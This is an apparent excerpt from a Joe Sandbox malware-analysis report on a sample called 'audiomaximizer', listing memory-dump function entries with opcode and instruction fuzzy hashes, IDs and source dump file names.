                                                                                                                                                                                • Opcode Fuzzy Hash: 6a858927fdeab78ef10a777ba43a6eefa8fd08e72d248953b3dea9dede9bc5aa
                                                                                                                                                                                • Instruction Fuzzy Hash: D7F0F6313002104B97267A6E9C54A2ABADEEFC8A55355417BEE09C7361EF60CC03C780
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000008.00000002.4132239889.0000000001680000.00000040.00000800.00020000.00000000.sdmp, Offset: 01680000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_8_2_1680000_audiomaximizer.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: d1f098ecf158f143ff55f909b2fb687438debc08e106be09e668ef37d2236d19
                                                                                                                                                                                • Instruction ID: 553180d8c4bcc78140aa1abd25ca76da226076e23dcd45db3811eeaa04a430a9
                                                                                                                                                                                • Opcode Fuzzy Hash: d1f098ecf158f143ff55f909b2fb687438debc08e106be09e668ef37d2236d19
                                                                                                                                                                                • Instruction Fuzzy Hash: 6001EC717006119F8724DF6ED48491AB7F6EF8961430586A9E009CB772DB70ED45DB90
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000008.00000002.4132239889.0000000001680000.00000040.00000800.00020000.00000000.sdmp, Offset: 01680000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_8_2_1680000_audiomaximizer.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: e037e92c03e4492c1dd1d08e829197567201b761b17ebadc16bba498bac3191b
                                                                                                                                                                                • Instruction ID: 650c5615a5953192de45d2e56179f71102b8036f899f46bc15475f740af9acdd
                                                                                                                                                                                • Opcode Fuzzy Hash: e037e92c03e4492c1dd1d08e829197567201b761b17ebadc16bba498bac3191b
                                                                                                                                                                                • Instruction Fuzzy Hash: 0BF0C231E00618AFDB21AF68DC407AFBFB5FB84620F44426EE60597781DB34A405CB90
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000008.00000002.4132239889.0000000001680000.00000040.00000800.00020000.00000000.sdmp, Offset: 01680000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_8_2_1680000_audiomaximizer.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: a18352d22637b16b535f01bffa87c0d9c05dc4f040d0413b355f17cd54d923c0
                                                                                                                                                                                • Instruction ID: 36b4b923a549f91fb02ef17a0a7861f3d9c9f3add59a04b8b40f0b0dfd7fb6ad
                                                                                                                                                                                • Opcode Fuzzy Hash: a18352d22637b16b535f01bffa87c0d9c05dc4f040d0413b355f17cd54d923c0
                                                                                                                                                                                • Instruction Fuzzy Hash: B1F08C32A001189FCB14DF69DC08AFEBBF6EBC8324F00C12AEA08D3214D7314A258B90
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000008.00000002.4132239889.0000000001680000.00000040.00000800.00020000.00000000.sdmp, Offset: 01680000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_8_2_1680000_audiomaximizer.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 3c31579c51eb803c6a5f6599e09a31a3a8a94e5958a602a7ce8155498a803d91
                                                                                                                                                                                • Instruction ID: 2b790b1df0d7161605bf83e06d75e20412aefc432347a2178d09960f5db85289
                                                                                                                                                                                • Opcode Fuzzy Hash: 3c31579c51eb803c6a5f6599e09a31a3a8a94e5958a602a7ce8155498a803d91
                                                                                                                                                                                • Instruction Fuzzy Hash: F7E0CD3000C3850FD70267785C625817F79DFC1100F4485F1D0400F16BCA7968568791
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000008.00000002.4132239889.0000000001680000.00000040.00000800.00020000.00000000.sdmp, Offset: 01680000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_8_2_1680000_audiomaximizer.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 1543b31be6f29a699bb3da1238625135c8af9e5716dff075c64f7589e3c2aa35
                                                                                                                                                                                • Instruction ID: d3305efa332e502a79e672c7e0414e40aba04923cf8d015e80b9d8d4e17c1d5f
                                                                                                                                                                                • Opcode Fuzzy Hash: 1543b31be6f29a699bb3da1238625135c8af9e5716dff075c64f7589e3c2aa35
                                                                                                                                                                                • Instruction Fuzzy Hash: 69E02631E543A68BCB01EBF09C100EEBB34ADD2221B58859BC0A537090EB30621AC7A3
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000008.00000002.4132239889.0000000001680000.00000040.00000800.00020000.00000000.sdmp, Offset: 01680000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_8_2_1680000_audiomaximizer.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: efdd3880e716a70faee64bc584c440e841db5a0f31b5e855859218b9caa2e06b
                                                                                                                                                                                • Instruction ID: 38500f3bade9f6392afe9a83f925e0f025d31839c3fe1b8d4446b912d8b1d3f2
                                                                                                                                                                                • Opcode Fuzzy Hash: efdd3880e716a70faee64bc584c440e841db5a0f31b5e855859218b9caa2e06b
                                                                                                                                                                                • Instruction Fuzzy Hash: 72D01231D2022A578B00AAA5DC044EEB738EE95665B504626D55437140EB70665986A2
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000008.00000002.4132239889.0000000001680000.00000040.00000800.00020000.00000000.sdmp, Offset: 01680000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_8_2_1680000_audiomaximizer.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: cab1b61c06a31221184b5866ca0dc1c63e1e9775e0f17d99bded96a436b0f698
                                                                                                                                                                                • Instruction ID: 72905df3068ac5a4c1593190b350f2c9fe1f64f0adfdcdc93d2127e2c5e7aceb
                                                                                                                                                                                • Opcode Fuzzy Hash: cab1b61c06a31221184b5866ca0dc1c63e1e9775e0f17d99bded96a436b0f698
                                                                                                                                                                                • Instruction Fuzzy Hash: 9AD0673BB40018DFCB149F99EC408DDF7B6FB98221B548116E915A3265C631A925DB94
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000008.00000002.4132239889.0000000001680000.00000040.00000800.00020000.00000000.sdmp, Offset: 01680000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_8_2_1680000_audiomaximizer.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: e1e98c2cdd4b4777a93845d746fe8cb750d27913a8844b09c9236e830a11ee1a
                                                                                                                                                                                • Instruction ID: 23ff8c828d257ef7df7648e41b0dd3da5d9792ffc290665c69dc0b07ad053fdc
                                                                                                                                                                                • Opcode Fuzzy Hash: e1e98c2cdd4b4777a93845d746fe8cb750d27913a8844b09c9236e830a11ee1a
                                                                                                                                                                                • Instruction Fuzzy Hash: A9C012310443094EC601FB65ED55995B72EE6D0200B40D93095050666DDF7D6C994BD5
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000008.00000002.4132239889.0000000001680000.00000040.00000800.00020000.00000000.sdmp, Offset: 01680000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_8_2_1680000_audiomaximizer.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID: \;^q$\;^q$\;^q$\;^q
                                                                                                                                                                                • API String ID: 0-3001612457
                                                                                                                                                                                • Opcode ID: 954e8d84d147530e456a5d13679e4d7bf570881295767e2d22ff9c721ff73ed6
                                                                                                                                                                                • Instruction ID: e746e19c9fecdf519cf638d1fc26083cf31f378021ef54e9a3ec61d6dead5134
                                                                                                                                                                                • Opcode Fuzzy Hash: 954e8d84d147530e456a5d13679e4d7bf570881295767e2d22ff9c721ff73ed6
                                                                                                                                                                                • Instruction Fuzzy Hash: E101DF31B401068FCF24AE2CC944AA677EBAF88A60725466AE546CF3F5DB31DC428780